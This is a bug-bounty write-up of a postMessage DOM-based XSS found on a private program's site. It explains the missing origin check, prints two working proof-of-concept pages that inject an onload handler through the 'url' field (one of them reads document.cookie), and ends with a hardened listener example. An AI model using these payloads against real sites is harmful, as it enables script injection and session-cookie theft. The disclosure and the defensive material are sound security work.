PostMessage XSS vulnerability on private program

postMessage:

The window.postMessage() method safely enables cross-origin communication between Window objects; e.g., between a page and a pop-up that it spawned, or between a page and an iframe embedded within it.

postMessage XSS:

A DOM-based XSS that occurs when postMessage is not implemented properly (no origin verification) and untrusted data received from another host is added to the DOM without any filtering.

Start:

While I was doing some research on a website of a private program, I got a notification from postMessage-tracker (an extension for Google Chrome which notifies you when a postMessage interaction is detected).

[Image: notification from postMessage tracker]
[Image: postMessage script]
[Image: creatFloatingPageElement function]
[Image: getDataFromEvent function]
<script>
// PoC page: embeds the affected page in an iframe and, once it has loaded,
// posts the "e:openFloatingPage" message the listener expects.
function SendMessage() {
  var IframeElement = document.getElementById('VulnerableSiteIframe');
  var message = {"message":"e:openFloatingPage","data":{
    "id":"1234gghq",
    "name":"tayba",
    "url":"https://www.framable.com\"+onload=alert()"
  }};
  // No target origin restriction on the sending side either
  IframeElement.contentWindow.postMessage(message, '*');
}
</script>
<!-- The iframe must sit outside the <script> block; onload fires SendMessage() -->
<iframe id="VulnerableSiteIframe" height="400" width="1024" src="https://redacted.com/bootstrap.php" onload="SendMessage()"></iframe>
<script>
// Same PoC against a second affected page (download.php), reading the cookie
function SendMessage() {
  var IframeElement = document.getElementById('VulnerableSiteIframe');
  var message = {"message":"e:openFloatingPage","data":{
    "id":"1234gghq",
    "name":"tayba",
    "url":"https://www.anything.com\"+onload=alert(document.cookie)"
  }};
  IframeElement.contentWindow.postMessage(message, '*');
}
</script>
<iframe id="VulnerableSiteIframe" height="400" width="1024" src="https://redacted.com/download.php?p=jjjj" onload="SendMessage()"></iframe>
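As an added example (not the author's PoC and not the program's own listener), here is what the receiving side of this message looks like once it is hardened, next to the unsafe string-building pattern the payload above relies on. The names creatFloatingPageElement and getDataFromEvent come from the screenshot captions; their bodies, the origin allowlist, the host allowlist, the message shape and the stub document are all assumptions for illustration.

```javascript
// Added example (not the program's code): a hardened listener for the
// "e:openFloatingPage" message, shown next to the unsafe pattern the write-up
// exploits. Function names creatFloatingPageElement / getDataFromEvent come from
// the write-up's screenshot captions; their bodies, the origin and host lists and
// the message shape are assumptions for illustration.

// Origins whose messages this frame will act on (placeholder values).
const TRUSTED_ORIGINS = new Set([
  "https://app.example.com",
]);

// Hosts the floating page is allowed to load (placeholder values).
const FRAMEABLE_HOSTS = new Set([
  "www.framable.com",
]);

// Unsafe pattern: concatenating the received URL into markup means a double
// quote in the value ends the src attribute and whatever follows becomes new
// attributes. This is the kind of sink the write-up's payload relies on.
function buildFloatingPageHtmlUnsafe(url) {
  return '<iframe src="' + url + '"></iframe>';
}

// Hardened URL check: must parse, must be https, host must be on the allowlist.
// Returns the normalised URL or null.
function validateFloatingPageUrl(value) {
  if (typeof value !== "string") return null;
  let parsed;
  try {
    parsed = new URL(value);
  } catch {
    return null;
  }
  if (parsed.protocol !== "https:") return null;
  if (!FRAMEABLE_HOSTS.has(parsed.hostname)) return null;
  return parsed.href;
}

// Origin check first, then structural validation of the payload.
function getDataFromEvent(event) {
  if (!TRUSTED_ORIGINS.has(event.origin)) return null;
  const msg = event.data;
  if (!msg || typeof msg !== "object" || msg.message !== "e:openFloatingPage") return null;
  const d = msg.data;
  if (!d || typeof d !== "object") return null;
  const url = validateFloatingPageUrl(d.url);
  if (url === null) return null;
  return { id: String(d.id ?? ""), name: String(d.name ?? ""), url };
}

// Minimal stand-in for `document` so the example runs under Node; in a browser
// pass the real document instead.
const stubDocument = {
  createElement(tagName) {
    return { tagName, id: "", title: "", src: "" };
  },
};

// Build the element with property assignment rather than an HTML string: the
// value lands in the attribute as data and cannot introduce new attributes.
function creatFloatingPageElement(data, doc = stubDocument) {
  const iframe = doc.createElement("iframe");
  iframe.id = data.id;
  iframe.title = data.name;
  iframe.src = data.url;
  return iframe;
}

// Entry point: returns the element to insert, or null when the message is
// rejected (wrong origin, wrong shape, or a URL that fails validation).
function handleOpenFloatingPage(event, doc = stubDocument) {
  const data = getDataFromEvent(event);
  return data === null ? null : creatFloatingPageElement(data, doc);
}

// Browser wiring (not executed here):
// window.addEventListener("message", (e) => {
//   const el = handleOpenFloatingPage(e, document);
//   if (el) document.body.appendChild(el);
// });
```

The two checks that matter are independent: the origin allowlist decides whether the message is listened to at all, and the URL validation plus property assignment decides what the data can do once accepted. Dropping either one reintroduces the bug, which is why a fix that only adds `event.origin` matching still leaves the attribute sink in place for any trusted page that can be tricked into relaying a value.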
